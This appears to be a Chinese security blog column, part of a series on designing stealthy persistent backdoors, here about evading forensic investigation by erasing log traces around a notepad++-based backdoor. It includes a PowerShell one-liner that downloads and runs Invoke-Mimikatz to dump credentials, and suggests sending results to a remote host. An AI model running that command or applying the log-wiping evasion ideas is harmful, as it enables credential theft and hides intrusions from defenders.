本文作者:Micropoor
本文属于安全脉搏专栏作者分享暨金币奖励计划
转载请参考:https://www.secpulse.com/archives/61458.html
前者的话:从第三季开始引入段子,让本枯燥的学术文章,也变得生动有趣。
第二季的Demo遵循人性五条来设计,回忆这其中五条:
攻击方与防御方的本质是什么?
增加对方的时间成本,人力成本,资源成本(不限制于服务器资源),金钱成本。
安全公司的本质是什么?
盈利,最小投入,最大产出。
安全公司产品的本质是什么?
能适应大部分客户,适应市场化,并且适应大部分机器。(包括不限制于资源紧张,宽带不足等问题的客户)
安全人员的本质是什么?
赚钱,养家。买房,还房贷。导致,快速解决客户问题(无论暂时还是永久性解决),以免投诉。
对接客户的本质是什么?
对接客户也是某公司内安全工作的一员,与概念4相同。
线索排查与反线索排查
那么这个demo离可高级可持续性渗透后门还有一段距离,这里引入第六条“线索排查”与“反线索排查”,在第二季的demo中,它生成了一个名为micropoor.txt的文件,如果经验丰富的安全人员可根据时间差来排查日记,demo的工作流程大致是这样的,打开notepad++,生成micropoor.txt,写入内容,关闭文件流。根据线索排查,定位到notepad++,导致权限失控。
在线索排查概念中,这里要引入“ABC”类线索关联排查,当防御者在得到线索A,顺藤到B,最后排查到目标文件C,根据五条中的第一条,demo要考虑如何删除指定日志内容,以及其他操作。来阻止ABC类线索关联排查。
不要思维固死在这是一个nontepad++后门的文章,它是一个面向类后门,面向的是可掌握源码编译的类后门。同样不要把思维固定死在demo中的例子,针对不同版本的NT系统,完全引用“powershell IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz”而关于bypass UAC,已经有成熟的源码。或发送至远程或是写在本地的图片里,不要让知识,限制了后门的想象。这也正是第一季所说的:一个优秀的Microdoor是量身目标制定且一般不具备通用性的。是的,一般不具备通用性。
观看目前文章的一共有2类人,一类攻击方,一类防守方。假设一个场景,现在摆在你面前有一台笔记本,并且这台笔记本有明确的后门,你的任务,排查后门。我想所有人都会排查注册表,服务,端口,进程等。因为这些具备通用性,也同样具备通用性排查手段。
临近文章结尾,第三次引用:在后门的进化对抗中,rootkit也发生了变化,最大的改变是它的系统层次结构发生了变化。如果彻底理解了这段话。那么就要引用王健X爸爸的一句话:先定个小目标,控它个1825天。
/*
段子
*/
奈何厂商不重视后渗透攻击与持久性攻击,文章的结尾引用马X爸爸的一句话:
厂商不改变,我们就改变厂商。
本文作者:Micropoor
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/66675.html